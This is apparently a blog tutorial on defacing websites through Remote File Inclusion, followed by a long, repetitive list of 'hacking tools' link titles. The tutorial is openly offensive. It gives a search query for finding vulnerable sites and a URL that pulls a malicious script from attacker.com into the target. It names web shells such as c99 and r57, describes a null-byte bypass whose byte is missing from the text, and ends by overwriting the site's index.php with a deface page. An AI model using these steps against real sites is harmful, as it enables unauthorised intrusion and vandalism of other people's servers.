HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?
Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.
SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?
First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
- You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
- Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
More articles
- Pentest Tools Github
- Hacking Tools Download
- Blackhat Hacker Tools
- Hacker Tools 2019
- Pentest Tools Windows
- How To Make Hacking Tools
- Hacking Tools Pc
- Hacker Tools Hardware
- Pentest Tools Github
- Hacking Tools Hardware
- Hacker Tools Mac
- Pentest Tools For Windows
- Hacking Tools For Kali Linux
- Computer Hacker
- What Are Hacking Tools
- Tools Used For Hacking
- Hacking Tools 2020
- Hacking Tools For Windows Free Download
- Hacker Tools Online
- Pentest Tools Windows
- Pentest Tools For Android
- Install Pentest Tools Ubuntu
- Tools For Hacker
- Hacker Tool Kit
- Hacking Tools Free Download
- Hacking Tools For Windows Free Download
- Tools Used For Hacking
- Hacker Tools Mac
- Hacking Tools Software
- Pentest Tools For Ubuntu
- Tools Used For Hacking
- Hacking Apps
- Hacker Tools For Pc
- Hack Tool Apk No Root
- Termux Hacking Tools 2019
- Best Pentesting Tools 2018
- Hacking Apps
- Pentest Tools Kali Linux
- Android Hack Tools Github
- Hacking Tools Software
- Underground Hacker Sites
- Hacking Tools 2020
- Hacking Tools Mac
- Hacking Tools Download
- Hacking Tools Usb
- How To Install Pentest Tools In Ubuntu
- Hacker Security Tools
- Hacker Security Tools
- Hack Tools Github
- Pentest Tools Online
- Pentest Tools Linux
- Hacker Tools For Pc
- Hacking Tools For Mac
- Hack Rom Tools
- Hacker Tools Online
- Pentest Tools Online
- Github Hacking Tools
- Hacker Security Tools
- Hack Tools Pc
- Hacking Tools 2019
- Hacker Tools Linux
- Tools Used For Hacking
- Hacking Tools Pc
- Hack Tools Mac
- Pentest Tools Kali Linux
- Hacking Tools Name
- New Hacker Tools
- Hacker Tools Free
- Hacker Techniques Tools And Incident Handling
- Termux Hacking Tools 2019
- Termux Hacking Tools 2019
- Hacker Search Tools
- Pentest Tools Url Fuzzer
- Hacker Tools Apk Download
- Hacker
- Hacking Tools Mac
- Hacker Tools List
- Pentest Tools Linux
- Hack Tool Apk
- Nsa Hacker Tools
- Github Hacking Tools
- Hacking Tools For Games
- Pentest Box Tools Download
- Hacking Apps
- Pentest Tools Subdomain
- Pentest Tools Github
- Hack Tools For Mac
- World No 1 Hacker Software
- World No 1 Hacker Software
- Nsa Hack Tools Download
- Hacker Tools For Pc
- Hack Tools Pc
- Hack Tools For Mac
- Hacking Tools Free Download
- Hack App
- Install Pentest Tools Ubuntu
- Hacker Tool Kit
- Hacker Tools 2019
- Pentest Box Tools Download
- Hack Tools For Windows
- Hack Tools
- New Hack Tools
- Hacker Tools Linux
- Hacking Tools For Mac
- Usb Pentest Tools
- Beginner Hacker Tools
- Best Pentesting Tools 2018
- Pentest Tools Github
- What Is Hacking Tools
- Pentest Tools Url Fuzzer
- Bluetooth Hacking Tools Kali
- Hacker Tools For Mac
- World No 1 Hacker Software
- Pentest Tools Tcp Port Scanner
- Hack Rom Tools
- Pentest Tools Kali Linux
- Usb Pentest Tools
- Hacking Tools Github
- Hacking Tools Usb
- Pentest Reporting Tools
- Hacking Tools For Kali Linux
- Computer Hacker
- Hacker
- Hacking Tools Online
- Best Hacking Tools 2019
- Hack Tools For Ubuntu
- Hacking Tools And Software
- Ethical Hacker Tools
- Hacking Tools For Windows Free Download
- Computer Hacker
- Hacker Hardware Tools
- Hacker Tool Kit
- Hacking Tools For Windows Free Download
- How To Make Hacking Tools
- Black Hat Hacker Tools
- Pentest Tools Windows
- Pentest Tools
- Hacker Tools 2020
- Hack Tools For Mac
- Physical Pentest Tools
- Hack Tools Download
0 Reactions to this post
Add CommentPost a Comment